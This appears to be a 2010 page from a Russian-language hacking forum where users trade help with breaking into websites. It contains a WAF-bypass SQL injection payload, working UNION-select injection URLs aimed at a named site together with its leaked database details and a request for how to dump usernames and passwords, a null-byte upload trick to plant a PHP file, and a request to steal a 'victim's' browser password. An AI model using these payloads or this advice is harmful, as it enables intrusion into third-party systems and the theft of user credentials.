
03.03.2010, 05:31
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
Сообщение от Strilo4ka
Чем полезен модуль mod_userdir [написал туда] ???
http://wiki.linuxformat.ru/index.php/LXF90:Apache, для хека даст развечто логины пользователей для последующего брутфорса.
|
|
|

03.03.2010, 18:47
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
С нами:
9055208
Репутация:
5
|
|
При MSSQL inj WAF удаляет select,какой есть аналог или как обойти?Спасибо
|
|
|

03.03.2010, 18:57
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
Сообщение от 2Fed123
При MSSQL inj WAF удаляет select,какой есть аналог или как обойти?Спасибо
/*!select*/
|
|
|

03.03.2010, 19:16
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
С нами:
9055208
Репутация:
5
|
|
or+1=(/*!select*/+table_name+from+information_schema.tables)--
ругается Line 1: Incorrect syntax near '/'.
|
|
|

03.03.2010, 20:18
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Если там банальный str_replace, попробуй с регистром поиграть, т.е (к примеру)
А если же str_ireplace, тогда так:
Но не факт что сработает, т.к. все вышесказанное основано лишь на догадках.
|
|
|

03.03.2010, 20:21
|
|
Новичок
Регистрация: 03.11.2006
Сообщений: 1
С нами:
10273983
Репутация:
0
|
|
Подскажите как мне узнать пароль от сайта в опере, если "жертва" не запоминает пароль и ставит галочку чужой компьютер?
|
|
|

04.03.2010, 01:40
|
|
Новичок
Регистрация: 03.03.2010
Сообщений: 9
С нами:
8522087
Репутация:
0
|
|
Не могу до конца раскрутить скул:
Код:
http://www.sixls.com/news.php?id=-3+union+select+1,concat_ws(0x0b, version(), database(), user()),3--
Версия: 5.0.88-community-log
Юзер: sixls_com_-_1
База: sixls@ww1.4what.net
Идут таблицы:
Код:
http://www.sixls.com/news.php?id=-3+union+select+1,table_name,3+from+information_schema.tables--
Дальше поля:
Код:
http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_schema.columns--
-----------------------------------------
Я искал на форуме и ни как не мог найти инфу о том как выводить поля, которые находятся в определенной таблице, и как из полей выводить нужные данные, например пароль и и мя пользователя. Заранее спасибо =)
|
|
|

04.03.2010, 02:25
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами:
9898501
Репутация:
257
|
|
Сообщение от Sharsky
Не могу до конца раскрутить скул:
Код:
http://www.sixls.com/news.php?id=-3+union+select+1,concat_ws(0x0b, version(), database(), user()),3--
Версия: 5.0.88-community-log
Юзер: sixls_com_-_1
База: sixls@ww1.4what.net
Идут таблицы:
Код:
http://www.sixls.com/news.php?id=-3+union+select+1,table_name,3+from+information_schema.tables--
Дальше поля:
Код:
http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_schema.columns--
-----------------------------------------
Я искал на форуме и ни как не мог найти инфу о том как выводить поля, которые находятся в определенной таблице, и как из полей выводить нужные данные, например пароль и и мя пользователя. Заранее спасибо =)
Для начала...
http://forum.antichat.ru/thread104591.html
|
|
|

04.03.2010, 07:50
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами:
9361870
Репутация:
58
|
|
как обойти такую конструкцию?)
$uploaddir = "../photos/";
$fext = ".gif";
move_uploaded_file($_FILES[$key]['tmp_name'], $uploaddir . $row['ID'] . "." . $key . $fext)
на $row['ID'] могу влиять)
сделал $row['ID'] = "1.php%00" получил:
Warning: move_uploaded_file(../photos/1.php%00.photo1.jpg) [function.move-uploaded-file]: failed to open stream: Permission denied in /usr/www/users/manager/updateProfile.php on line 814
создать фаил прав не хватает или что то другое?
|
|
|

04.03.2010, 18:22
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от j0ker13
как обойти такую конструкцию?)
на $row['ID'] могу влиять)
сделал $row['ID'] = "1.php%00" получил:
Warning: move_uploaded_file(../photos/1.php%00.photo1.jpg) [function.move-uploaded-file]: failed to open stream: Permission denied in /usr/www/users/manager/updateProfile.php on line 814
создать фаил прав не хватает или что то другое?
Насколько я понял, ты $row['id'] устанавливаешь методом POST, где данные передаются "как есть", т.е. не url-encoded символы не превращаются в обычные. Попробуй обратится GET'ом, или COOKIE. Если запрос в БД идет через глобальный массив _REQUEST, то должно сработать.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|